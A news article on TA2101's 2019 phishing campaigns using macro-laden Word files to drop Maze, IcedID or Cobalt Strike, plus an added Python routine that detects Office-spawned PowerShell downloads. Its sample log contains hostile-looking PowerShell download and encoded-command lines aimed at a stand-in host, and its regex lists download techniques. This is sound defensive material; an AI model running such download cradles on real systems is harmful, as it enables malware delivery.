15 November 2019

New group of hackers targets businesses with backdoor malware in financially-motivated attacks

Proofpoint researchers uncovered a new phishing scheme that targets several businesses and organizations in Germany, Italy, and the United States in order to infect their networks with malware. The attacks are orchestrated by a relatively new hacking crew, tracked as TA2101, that appears to be interested in the business, IT services, manufacturing, and healthcare industries.

The threat actor uses legitimate, licensed penetration testing tools and backdoor frameworks such as Cobalt Strike and Metasploit for post-exploitation operations. The malware is delivered via spear-phishing emails purporting to be from financial regulatory agencies.

Between October and November 2019, Proofpoint researchers observed several campaigns that used malicious email messages to infect organizations in Germany, Italy, and the United States with backdoor, banking Trojan, or ransomware malware. In all observed cases the attackers used malicious Word document attachments as an initial vector to compromise the device.

Once opened, the attachment executes a Microsoft Office macro that, in turn, executes a PowerShell script, which downloads and installs one of the malicious payloads (Maze ransomware, the IcedID trojan or a Cobalt Strike backdoor) onto the victim’s system.
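The chain above (Office macro spawning PowerShell that fetches a payload) leaves a recognizable trace in process-creation telemetry. The following detection routine is an added example, not code from the article or from Proofpoint; the log format, the `OFFICE_PARENTS` list (which generalizes beyond Word to Excel and PowerPoint) and the download-cradle patterns are assumptions, and the sample records are constructed, not real campaign data.

```python
"""Flag process-creation events where a Microsoft Office application spawns
PowerShell with a command line that fetches or decodes a payload."""
import re
from typing import Dict, List

# Assumed parent/child process names; extends the page's Word case to other Office apps.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Assumed indicators of a download-and-run PowerShell command line.
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|\s-enc(odedcommand)?\b|frombase64string)",
    re.IGNORECASE,
)


def parse_event(line: str) -> Dict[str, str]:
    """Parse a 'key=value|key=value' record (constructed log format, not a real product's)."""
    return dict(field.split("=", 1) for field in line.rstrip("\n").split("|"))


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_office_download_chain(event: Dict[str, str]) -> bool:
    """True when an Office app launched a shell whose command line shows a download cradle."""
    if basename(event.get("parent", "")) not in OFFICE_PARENTS:
        return False
    if basename(event.get("image", "")) not in SHELLS:
        return False
    return DOWNLOAD_CRADLE.search(event.get("cmdline", "")) is not None


def find_suspicious(lines: List[str]) -> List[str]:
    """Return the pids of events matching the Office -> PowerShell download pattern."""
    return [ev["pid"] for ev in map(parse_event, lines) if is_office_download_chain(ev)]


# Constructed sample events (hypothetical paths, pids and hostnames).
SAMPLE_LOG = [
    "pid=4120|parent=C:\\Office16\\WINWORD.EXE|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmdline=powershell -w hidden -nop (New-Object Net.WebClient).DownloadString('http://lookalike.example.invalid/doc')",
    "pid=4131|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmdline=powershell Get-ChildItem C:\\Users",
    "pid=4140|parent=C:\\Office16\\WINWORD.EXE|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmdline=powershell -NoProfile Get-Date",
    "pid=4155|parent=C:\\Office16\\EXCEL.EXE|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmdline=powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
]

if __name__ == "__main__":
    print(find_suspicious(SAMPLE_LOG))  # prints ['4120', '4155']
```

Only the Word and Excel events that both originate from an Office parent and carry a download or decode indicator are flagged; an Office-spawned shell running a benign cmdlet is not.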

In addition to social engineering, the hackers are also using stolen branding and lookalike domains of European taxation agencies and other public-facing entities, such as Internet service providers, to make the phishing emails look even more convincing. In the recent campaigns, the phishing emails were observed impersonating the following entities:

Bundeszentralamt für Steuern, the German Federal Ministry of Finance,

Agenzia Delle Entrate, the Italian Revenue Agency,

1&1 Internet AG, a German internet service provider,

USPS, the United States Postal Service.

“The increasing sophistication of these lures mirrors improved social engineering and a focus on effectiveness over quantity appearing in many campaigns globally across the email threat landscape,” the researchers concluded.

A more detailed analysis, as well as Indicators of Compromise (IoCs) related to the recent campaigns, is available in Proofpoint's blog post.
